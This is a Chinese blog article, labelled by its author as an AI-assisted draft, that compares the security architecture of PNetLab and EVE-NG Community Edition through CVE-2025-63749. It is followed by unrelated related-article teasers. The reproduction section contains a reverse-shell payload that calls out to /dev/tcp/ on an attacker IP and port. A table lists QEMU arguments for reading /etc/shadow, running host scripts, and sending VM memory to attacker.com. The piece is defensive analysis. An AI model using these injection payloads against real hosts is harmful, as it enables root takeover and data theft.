当前位置: 首页 > article >正文

PNetLab-vs-EVE-NG安全性分析

1 PNetLab vs EVE-NG社区版从一次CVE看免费fork的安全代价1.1 痛点引入2025年11月CVE-2025-63749被公开披露——PNetLab 5.3.11存在命令注入漏洞攻击者通过qemu_options参数注入$(/bin/bash -c reverse_shell)直接获取宿主机root权限。一个有实验编辑权限的普通用户就能接管整台服务器。而EVE-NG社区版面对同样的攻击面——同样允许用户自定义qemu_options同样将参数拼接到QEMU命令行——却没有被同样的方式打穿。为什么不是运气是六层防御的差距。这篇文章从CVE-2025-63749出发逐层拆解两个平台的安全架构差异。1.2 核心知识同源不同命——六层防御对比1.2.1 血缘关系PNetLab基于EVE-NG Community Edition 2.0.3-105分支fork开发时间约在2019年。这意味着在fork的起点两者的代码几乎相同。但fork之后EVE-NG持续演进安全机制PNetLab停留在2.0.3-105时代的安全水平比当前6.2.0-4落后了多个大版本的安全更新。1.2.2 六层防御逐层对比防御层机制EVE-NG 6.2.0-4PNetLab 5.3.11差距说明L1Shell元字符清洗escapeshellcmd()— PHP标准库函数过滤$、反引号等所有shell元字符secureCmd()— 自定义函数仅过滤部分字符PNetLab的secureCmd()不过滤$()命令替换直接导致CVE-2025-63749L2圆括号转义preg_replace将()转义为\(\)使shell不再解释为命令替换配合L1的escapeshellcmd()转义$等元字符$(cmd)变为$\(cmd\)命令替换失效无PNetLab完全缺失此层L3引号转义shell命令行保护addslashes()— 防止qemu_options中的引号破坏命令行结构避免参数截断如-drive file/tmp/test导致引号提前闭合无等价措施PNetLab完全缺失此层与SQL注入无关L4chroot文件系统隔离qemu_wrapperC二进制在启动QEMU前执行chroot(.)将进程限制在运行目录内无chroot无chroot意味着QEMU进程可直接访问宿主机文件系统L5进程组权限限制QEMU节点setgid(32768)到unl组但仍以root运行未执行setuid降权以root运行无任何限制两者QEMU节点均为root身份EVE-NG仅在组层面做了受限QEMU未降权是两者共同短板需seccomp或用户命名空间真正兜底L6只读挂载保护镜像目录mount -B -o ro只读挂载 chattr i设置不可变属性无无只读保护意味着被入侵后镜像文件可被篡改1.2.3 CVE-2025-63749的攻击路径复现在PNetLab中攻击者只需三步创建实验添加QEMU节点在qemu_options字段注入payload$(/bin/bash -c bash -i /dev/tcp/攻击者IP/端口 01)启动节点 → reverse shell以root权限回连为什么能成功因为secureCmd()函数的三个致命错误错误描述不过滤$()命令替换$(cmd)是shell注入最常见的手法secureCmd()完全未处理仅移除单引号str_replace(, )只处理单引号双引号和反引号不受影响黑名单思路试图列举危险字符来过滤而安全实践要求白名单——只允许已知安全的字符而EVE-NG用PHP标准库函数escapeshellcmd()替代了自定义过滤。这个函数由PHP核心团队维护经过20年以上的安全迭代覆盖所有已知的shell元字符。这就是不自造安全函数的原则。1.2.4 无chroot的后果L1被绕过后的全盘崩溃假设攻击者找到了escapeshellcmd()的0day绕过方式PHP历史上确实出现过EVE-NG的L4chroot仍然是第二道防线——QEMU进程被限制在运行目录内无法读取/etc/shadow无法执行/bin/bash。而PNetLab没有chrootL1一旦被绕过攻击者直接获得宿主机完整文件系统访问权限。通过QEMU参数可以实现QEMU参数攻击效果EVE-NG chroot是否阻断-drive file/etc/shadow读取宿主机密码文件是-fw_cfg nameopt/ovf/etc,file/etc/ssh/sshd_config泄露SSH配置是-netdev tap,script/tmp/evil.sh在宿主机执行任意脚本是-chardev file,idlog,path/tmp/out向宿主机任意路径写入是-migrate tcp:attacker.com:1234向外部发送VM内存快照否网络层攻击chroot不保护1.3 操作步骤EVE-NG的jail机制如何工作理解防御的最好方式是看它的完整链路用户通过Web UI设置qemu_options | v __node.php:756 存储到Node对象 __node.php:1073 读取qemu_options __node.php:1078 拼接flags: $flags . .$qoptions | v cli.php:982 list($bin, $flags) $n-getCommand() cli.php:1118 $cmd . -- .$flags. wrapper.txt 21 | v qemu_wrapperC二进制执行 1. chdir(运行目录) -- /opt/unetlab/tmp/{tid}/{lid}/{nid}/ 2. chroot(.) -- QEMU进程被限制在此目录 3. exec(qemu-system-x86_64 $flags) -- 在chroot中启动QEMU三层清洗L1-L3在PHP层完成阻止shell注入。三层隔离L4-L6在运行时完成阻止文件系统越界。即使某一层被绕过下一层仍然生效——这就是纵深防御。1.4 常见报错及安全自查安全风险检查方法EVE-NGPNetLab是否有chroot隔离检查/opt/unetlab/wrappers/qemu_wrapper二进制是否包含chroot调用有无qemu_options是否过滤在qemu_options中输入$(id)后启动节点观察是否执行不执行escapeshellcmd过滤执行CVE-2025-63749镜像目录是否只读执行mountgrep unetlab检查是否有ro挂载有jail目录是否锁定执行lsattr /opt/unetlab/jail/检查i标志有无是否有安全更新渠道检查apt update是否有官方源Ubuntu 22.04 LTS官方源更新停滞1.5 总结升华选型速查表维度EVE-NG社区版PNetLab安全架构三层清洗 三层隔离纵深防御仅靠自定义secureCmd()已证明失效已知CVEWeb UI操作范围内无可利用漏洞06.11安全报告验证CVE-2025-63749root级命令注入、CVE-2024-51111XSS代码维护活跃持续安全更新停滞安全补丁滞后许可证BSDPHP/C二进制 专有UI/Go法律清晰Fork争议法律模糊底层OSUbuntu 22.04 LTS定期内核安全更新基于旧版Ubuntu更新频率极低社区支持持续增长正在收缩适用场景个人学习/CCNA-CCNP/企业POC仅限隔离环境下的个人尝鲜一句话结论PNetLab和EVE-NG社区版虽然代码同源但fork后的安全演进已经拉开代差。EVE-NG用6年时间构建了纵深防御体系PNetLab停留在2019年的安全水平。CVE-2025-63749不是偶然而是六年安全债务的集中爆发。给你的建议如果你在用PNetLab做实验至少把服务器放在隔离网络中不要暴露到公网不要给不信任的人分配实验编辑权限如果你在考虑选型同样免费选EVE-NG社区版——多6年的安全更新不是一个可选项而是一个必选项如果你在企业环境直接上EVE-NG ProRBAC 专业支持 法律合规这是唯一正确的选择本文为AI辅助生成草稿技术细节请以实际环境验证为准。CVE信息来自公开漏洞数据库安全分析基于EVE-NG知识库源码审计文档。1.6 内容来源本文素材来自以下来源按章节索引1.6.1 痛点引入CVE-2025-63749Volerion / NVD / 绿盟NSFOCUSPNetLab 5.3.11命令注入漏洞公开披露信息CVE-2024-51111TenablePNetLab 5.3.11 XSS漏洞1.6.2 六层防御对比**09.6 QEMU **Jail机制与安全对比分析.md核心结论三层清洗三层隔离体系、第1章攻击面分析QEMU参数攻击向量表、第2章Jail安全隔离机制三层隔离架构、完整调用链、第6章PNetlab对比分析六层防御逐层对比表、攻击向量穿透测试表、L1-L6逐层详解、第7章PNetlab secureCmd()分析源码片段、三个致命错误、第8章纵深防御价值攻击类型与防御层对应表、历史时间线05 config_scripts完整分析.mdDocker nsenter命令注入(C1)、硬编码凭证(C2)、Mikrotik后门账户(C3)、Docker API无认证(C4)、init/prep脚本路径注入(C5)1.6.3 jail机制工作链路**09.6 QEMU **Jail机制与安全对比分析.md第2章完整调用链__node.php→cli.php→qemu_wrapper→chroot**T-STARTNODE **启动节点.mdprepareNode()流程、getCommand()调用链1.6.4 安全自查**06.11 **安全漏洞报告.mdEVE-NG CE 6.2.0-4安全审查结论Web UI操作范围内无可利用漏洞**09.6 QEMU **Jail机制与安全对比分析.md第4章chroot文件系统范围验证、浏览器mount实测输出1.6.5 选型对比PNETLab vs EVE-NG: Free Fork or the Real Thing?CloudMyLab博客代码来源与血缘关系、维护状况对比、安全风险与合规、功能与限制对比、结论与建议EVE-NG License文档许可证体系BSD 专有**09.6 QEMU **Jail机制与安全对比分析.md第8章历史时间线2019 fork → 2022 jail引入 → 2025 CVE披露

相关文章:

PNetLab-vs-EVE-NG安全性分析

1 PNetLab vs EVE-NG社区版:从一次CVE看"免费fork"的安全代价 1.1 痛点引入 2025年11月,CVE-2025-63749被公开披露——PNetLab 5.3.11存在命令注入漏洞,攻击者通过qemu_options参数注入$(/bin/bash -c reverse_shell),…...

毕业设计 深度学习多目标跟踪 实时检测

文章目录 0 前言2 目标跟踪效果3 目标跟踪的两种方法3.1 方法13.2 方法2 4 Tracking By Detecting的跟踪过程4.1 存在的问题4.2 基于轨迹预测的跟踪方式 5 训练代码6 最后 0 前言 🔥 今天学长向大家分享一个毕业设计项目 为了大家能够顺利以及最少的精力通过毕设&…...

TP-LINK AX300 网卡驱动

TP-LINK AX300无线网卡的驱动一直不更新,只好自己动手 适配:TL-XDN6000H 免驱版 操作系统:Ubuntu 24.04.4 LTS 内核版本:6.17.0-29-generic #29~24.04.1-Ubuntu https://download.csdn.net/download/zzzhy/92882718...

6 个 AI Agent Skill 实战推荐:每天省出 2 小时的自动化方案

引言Agent 能帮我们做的事越来越多 -- 写文案、做封面、盯数据、找选题。但很多人装上 Agent 之后发现,它除了聊天和写几段文案,好像什么也干不了。问题不在 Agent。就像刚买回来的手机,没装 App 之前就是块砖。Agent 出厂自带的能力有限&…...

避开CASA模型NPP估算的那些坑:我的IDL代码调试与参数优化心得

避开CASA模型NPP估算的那些坑:我的IDL代码调试与参数优化心得 第一次用CASA模型估算NPP时,我对着屏幕上的异常结果发呆了半小时——明明按照教程一步步操作,为什么输出的NPP值会出现大面积负值?后来才发现,温度胁迫因子…...

RAG夺命10连问,你能抗住第几问?

前言最近金三银四,很多小伙伴在准备大厂面试,几乎每个人都被问到了同一个技术点——RAG(检索增强生成)。从阿里到字节,从腾讯到美团,RAG已经成为大模型应用方向必考的“压轴题”。但是,很多求职…...

高并发下是先写数据库,还是先写缓存?

前言 数据库和缓存(比如:redis)双写数据一致性问题,是一个跟开发语言无关的公共问题。尤其在高并发的场景下,这个问题变得更加严重。 我很负责的告诉你,该问题无论在面试,还是工作中遇到的概率…...

G101EVT05.1友达液晶屏10.1寸LCD工业电阻触摸液晶屏幕

G101EVT05.1 G101EVT05.1是友达AUO的一款10.1英寸工业触摸液晶屏模组。公开资料显示,这款屏采用1280800分辨率、16:10比例、400cd/m典型亮度、LVDS接口、WLED背光、投射式电容触摸屏PCAP,整体更偏向工业平板、HMI、人机界面、医疗终端、嵌入式控制设备&a…...

开启AI端侧能源新纪元 豪鹏科技亮相CIBF 2026

导读:豪鹏科技锚定“AI端侧电池固态电池”双轮驱动核心路径,完成从传统电池制造商到AI端侧能源引领者的跨越式转型,以硬核技术与前瞻布局,领航端侧能源产业迈向高质量发展新征程。以下为文章正文:图片来源于电池百人会…...

Perplexity图标搜索效率提升300%:从零配置到精准获取的5步实战工作流

更多请点击: https://kaifayun.com 第一章:Perplexity图标资源搜索 在构建与 Perplexity AI 集成的前端应用或开发调试工具时,获取其官方图标资源是品牌一致性与用户体验的关键环节。Perplexity 官方未提供公开的图标下载中心,但…...

别再让烙铁头‘烧死’了!手把手教你电烙铁日常保养与复活术(附温度设置建议)

电烙铁头养护全攻略:从氧化原理到实战修复技巧 1. 烙铁头氧化背后的科学原理 烙铁头氧化并非单纯由高温引起,而是高温与氧气共同作用的结果。当烙铁头暴露在空气中时,高温会加速金属表面与氧气的化学反应,形成一层致密的氧化层。这…...

告别抓包烦恼:用Mitmproxy + Python脚本自动解密App接口数据(保姆级实战)

移动端App接口数据解密实战:Mitmproxy与Python自动化逆向分析 在移动应用安全测试和逆向工程领域,App与服务器之间的加密通信一直是分析人员的重点攻克对象。当面对一个网络请求被深度加密的App时,传统抓包工具往往只能展示一堆"乱码&qu…...

Hyper-V虚拟机文件迁移避坑指南:从C盘挪走Ubuntu,释放系统盘空间

Hyper-V虚拟机文件迁移实战:安全释放C盘空间的完整方案 当你在Windows系统上使用Hyper-V运行Ubuntu虚拟机时,是否注意到C盘空间正在被悄悄吞噬?许多技术爱好者初次接触Hyper-V时,往往直接采用默认设置,将所有虚拟机文件…...

别再只会调库了!用NumPy手搓SMOTE算法,从原理到代码保姆级拆解

从零实现SMOTE算法:用NumPy彻底掌握类别不平衡处理技术 在数据科学项目中,我们常常会遇到类别不平衡问题——某些类别的样本数量远少于其他类别。这种不平衡会导致模型过度关注多数类而忽略少数类。传统解决方案如随机过采样可能引发过拟合,而…...

告别日志脱敏烦恼:手把手教你用sensitive注解优雅保护用户隐私数据

优雅实现日志脱敏:基于注解的隐私数据保护实战指南 在金融、电商等强合规领域,用户隐私数据保护早已从"可选"变为"必选"。每次看到同事在代码中手动拼接"手机号:"user.getPhone().substring(0,3)"****&qu…...

tRPC全栈类型安全实战

tRPC全栈类型安全实战:告别API类型地狱,TypeScript前后端零成本类型共享 摘要:在全栈TypeScript项目中,前后端类型不同步是最常见的Bug来源之一。tRPC通过编译时类型推导,实现了端到端的类型安全——前端调用后端API就像调用本地函数一样,类型自动推导、错误提前暴露。本…...

Perplexity症状查询功能性能对比白皮书:横向测试12家竞品,它在罕见病关键词召回率上领先41.6%,但时间敏感场景响应超时率达23.8%

更多请点击: https://intelliparadigm.com 第一章:Perplexity症状查询功能概览 Perplexity 是一款面向开发者与临床信息学研究人员设计的轻量级症状语义推理工具,其核心能力在于将自然语言描述的症状短语映射至标准化医学本体(如…...

紧急!你的灵感工作流正在被Perplexity范式淘汰:3个信号预警+2天迁移 checklist(含Prompt审计表)

更多请点击: https://codechina.net 第一章:紧急!你的灵感工作流正在被Perplexity范式淘汰:3个信号预警2天迁移 checklist(含Prompt审计表) 当你反复修改同一个提示词却仍得不到结构化输出,当团…...

TVBox 最新版本 | 接口持续更新 | 追剧稳定不失效

分享一个自用很久、一直在持续维护更新的 TVBox 版本,主打稳定、流畅、长期可用,接口会定期更新,避免失效问题。 🔥资源特点 精准区分 64 位新设备 / 32 位老设备,安装更适配全设备兼容:电视、盒子、手机…...

技术文档检索总失败?Perplexity的chunking策略、embedding模型选型与rerank阈值调优(附实测Benchmark数据)

更多请点击: https://codechina.net 第一章:技术文档检索总失败?Perplexity的chunking策略、embedding模型选型与rerank阈值调优(附实测Benchmark数据) 技术文档检索失败常源于文本切分不合理、语义表征能力不足或重排…...

深度解读|当增强现实遇上美妆教学:帕克西的AR美妆实训解决方案

在职业院校的形象设计、美容化妆等专业中,实训教学长期面临耗材成本高、练习机会有限、考核标准难量化等难题。学生每练习一次就消耗一次化妆品;教师逐个检查妆容步骤,费时费力。 增强现实(AR)技术的介入,正…...

GitHub项目改名后,本地仓库如何无缝衔接?保姆级操作指南(含常见错误排查)

GitHub项目改名后本地仓库无缝衔接全攻略:从原理到实战 当你兴冲冲地在GitHub上给项目改了个更酷的名字,回到命令行却看到一堆红色报错信息时,那种感觉就像搬家后发现自己忘带钥匙。本文将带你深入理解Git远程仓库的连接机制,并提…...

告别GUI框架:在嵌入式Linux上用framebuffer手撸一个简易绘图库(附完整代码)

告别GUI框架:在嵌入式Linux上用framebuffer手撸一个简易绘图库 在资源受限的嵌入式Linux环境中,图形界面开发往往面临两难选择:要么使用Qt、SDL等重型框架消耗宝贵的内存和CPU资源,要么放弃图形功能转向纯命令行交互。本文将为开发…...

别只盯着TPS!用JMeter汇总报告做一次完整的性能瓶颈分析实战

别只盯着TPS!用JMeter汇总报告做一次完整的性能瓶颈分析实战 在性能测试领域,JMeter的汇总报告(Summary Report)是最常用的监听器之一,但很多测试工程师往往只关注其中的TPS(每秒事务数)指标&am…...

终极指南:如何一键重置JetBrains IDE试用期,免费获得全新30天评估时间

终极指南:如何一键重置JetBrains IDE试用期,免费获得全新30天评估时间 【免费下载链接】ide-eval-resetter 项目地址: https://gitcode.com/gh_mirrors/id/ide-eval-resetter JetBrains IDE试用期重置是每个开发者都需要的实用技能,当…...

避坑指南:在Docker里部署OpenWrt做软路由,这几个macvlan和网络配置的坑你别踩

DockerOpenWrt软路由避坑实战:macvlan网络疑难解析与高阶配置 当你在双网口服务器上尝试用Docker部署OpenWrt软路由时,是否经历过这样的绝望时刻:所有配置看似正确,但客户端设备就是无法上网;宿主机与容器仿佛身处平行…...

IDEA里Git冲突别慌!手把手教你用Rebase和Merge搞定,附代码消失急救指南

IDEA中Git冲突与代码消失的终极解决方案:Rebase与Merge实战指南 在团队协作开发中,Git冲突如同程序员日常的"必修课",而IDEA作为Java开发者最信赖的IDE,其内置的Git工具链却常被低估。当你在深夜赶进度时突然遭遇冲突警…...

亚马逊英国站儿童挤压玩具

亚马逊英国站儿童挤压玩具,核心定位为3岁以上儿童设计的感官类玩具,主打触觉反馈与手部精细动作锻炼,是平台上受众较广的儿童玩具品类之一,其核心特点与平台合规要求需重点关注。产品核心特征方面,这类玩具多采用热塑性…...

OpenWrt自动化神器:用luci-app-nettask插件,把物理按键和断网都变成触发器

OpenWrt自动化神器:用luci-app-nettask插件解锁硬件触发潜能 你是否曾想过,家里那台默默工作的路由器,除了提供Wi-Fi信号外,还能成为智能家居的中枢神经?当网络突然中断时,它能自动重连并发送通知&#xff…...

AI 测试必修课:深入理解 LLM 的 Token、上下文与温度参数

一位资深测试工程师的血泪忠告:“你花三个月搭建的测试框架崩溃了——不是因为代码逻辑有bug,而是因为昨天 temperature 是 0 的时候模型输出是‘PASS’,今天同样的代码、同样的输入,模型说‘FAIL’。你以为温度设成 0 就稳了?天真。” 这是一篇写给 AI 测试工程师、LLM 应…...